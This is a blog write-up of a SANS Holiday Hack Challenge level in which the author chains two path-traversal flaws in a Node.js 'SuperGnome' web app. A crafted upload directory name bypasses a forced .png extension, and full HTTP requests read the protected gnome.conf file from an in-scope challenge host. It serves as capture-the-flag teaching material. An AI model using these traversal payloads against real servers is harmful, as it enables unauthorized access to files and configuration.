Write up: 2015 Sans Holiday Hack Challenge – Part 4.2

Introduction

San Institute regularly creates a Christmas holiday hack challenge.

These challenges are a good way to try out new techniques or grow your knowledge in some new area.

As I get time to tackle the challenges I will write up my solution, frustrations and share any techniques that may come in handy for future challenges.

Challenge

List of SuperGnome IP addresses were obtained from challenge 4 and verified with Tom Hessman.

Part 4 of the challenge https://holidayhackchallenge.com/

7) Please describe the vulnerabilities you discovered in the Gnome firmware.

8) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN IN THE DOSIS NEIGHBORHOOD, attempt to remotely exploit each of the SuperGnomes. Describe the technique you used to gain access to each SuperGnome’s gnome.conf file. YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE DOSIS NEIGHBORHOOD EXPLICITLY ACKNOWLEDGES AS “IN SCOPE.” ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.

Please note: Although each SuperGnome is remotely exploitable based on flaws you can discover in the Gnome firmware, we DO NOT expect every participant to compromise every SuperGnome. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all five SuperGnomes, we happily accept partial answers and point out that they too are eligible for any of the prizes.

Looks like we have to compromise the following hosts on the Internet

52.192.152.132
52.2.229.189
54.233.105.81
52.64.191.71
52.34.3.80

Vulnerabilities can be discovered by looking at the firmware dump.

Flag “Your goal is to retrieve the /gnome/www/files/gnome.conf file from each SuperGnome.”

52.34.3.80

Time to take a poke at the live host.

I’m going to fire up ‘Burp Suite Pro’ and configure my ‘Iceweasel’ to proxy through Burp using ‘foxyproxy’ plugin.

When hitting the server we see the Supergnome’s name which in this case is

SuperGnome 02

We are prompted for a username and password.

Using ‘admin’ and ‘SittingOnAShelf’ as the password gets us in.

After some initial poking around, this host appears to have the settings ‘upload’ feature enabled.

Let’s take a look at the web source code obtained from the firmware.

$ less -N www/routes/index.js
 127 // SETTINGS UPLOAD
 128 router.post('/settings', function(req, res, next) {
 129 if (sessions[sessionid].logged_in === true && sessions[sessionid].user_level > 99) { // AUGGIE: settings upload allowed for adm 129 ins (admins are 100, currently)
 130 var filen = req.body.filen;
 131 var dirname = '/gnome/www/public/upload/' + newdir() + '/' + filen;
 132 var msgs = [];
 133 var free = 0;
 134 disk.check('/', function(e, info) {
 135 free = info.free;
 136 });
 137 try {
 138 fs.mknewdir(dirname.substr(0,dirname.lastIndexOf('/')));

Looks like if we can manipulate ‘filen’ then we can potentially create a directory and maybe some directory traversal will allow us to specify a path of our own choice.

But this doesn’t get us the gnone.conf flag.

Let’s look else where in the web source code for any other potential avenues.

The ‘Cameras’ feature looks promising.

 184 router.get('/cam', function(req, res, next) {
 185 var camera = unescape(req.query.camera);
 186 // check for .png
 187 //if (camera.indexOf('.png') == -1) // STUART: Removing this...I think this is a better solution... right?
 188 camera = camera + '.png'; // add .png if its not found
 189 console.log("Cam:" + camera);
 190 fs.access('./public/images/' + camera, fs.F_OK | fs.R_OK, function(e) {
 191 if (e) {
 192 res.end('File ./public/images/' + camera + ' does not exist or access denied!');
 193 }
 194 });
 195 fs.readFile('./public/images/' + camera, function (e, data) {
 196 res.end(data);
 197 });
 198 });

Hmm, again some potential directory traversal vulnerability but there is the challenge of bypassing an enforced .png file extension for the called file.

What about if we combine two exploits.

I did some initial testing for the first vulnerability using nodejs shell.

kali:~/projects/sans$ nodejs
> fs.mknewdir = function(dirPath, mode, callback) {
... fs.mkdir(dirPath, mode, function(error) {
..... if (error && error.code === 'ENOENT') {
....... fs.mknewdir(path.dirname(dirPath), mode, callback);
....... fs.mknewdir(dirPath, mode, callback);
....... }
..... callback && callback(error);
..... });
... };
[Function]
> fs.mknewdir(dirname.substr(0,dirname.lastIndexOf('/')));
undefined
> dirname = './mydir/zzzz/../file3.cfg/aaaa'
'./mydir/zzzz/../file3.cfg/aaaa'
> fs.mknewdir(dirname.substr(0,dirname.lastIndexOf('/')));
undefined
> 
(^C again to quit)

Check that we were able to create the directory.

kali:~/projects/sans$ ls -la mydir/
total 16
drwxr-xr-x 4 remote remote 4096 Dec 16 00:53 .
drwxr-xr-x 4 remote remote 4096 Dec 16 00:53 ..
drwxr-xr-x 2 remote remote 4096 Dec 16 00:53 file3.cfg
drwxr-xr-x 2 remote remote 4096 Dec 16 00:53 zzzz

So what if we can create a directory with a ‘.png’ in its name.

POST /settings HTTP/1.1
Host: 52.34.3.80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://52.34.3.80/settings
Cookie: sessionid=BbUumpMl2OU1fe5GYFDt
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
filen=../files/file2.png/&file=myfile.js
HTTP/1.1 200 OK
X-Powered-By: GIYH::SuperGnome by AtnasCorp
Content-Type: text/html; charset=utf-8
Content-Length: 3429
ETag: W/"d65-SGz46gD+QTyksgcZK6Imfw"
Date: Wed, 16 Dec 2015 09:29:12 GMT
Connection: keep-alive
...
<div class="jumbotron"><h1>Settings</h1><p class="message">Dir /gnome/www/public/upload/MfsSCjYL/../files/file2.png/ created successfully!</p>
...
</body></html>

 

Let’s now exploit the second vulnerability and leverage the new directory we created to bypass the png extension check.

GET /cam?camera=../../../www/public/upload/MfsSCjYL/../files/file2.png/../../../../files/gnome.conf HTTP/1.1
Host: 52.34.3.80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://52.34.3.80/cameras
Cookie: sessionid=BbUumpMl2OU1fe5GYFDt
Connection: keep-alive

 

HTTP/1.1 200 OK
X-Powered-By: GIYH::SuperGnome by AtnasCorp
Date: Wed, 16 Dec 2015 09:33:32 GMT
Connection: keep-alive
Content-Length: 339
Gnome Serial Number: XKCD988
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-02
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/

Flag is XKCD988

Thank you

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s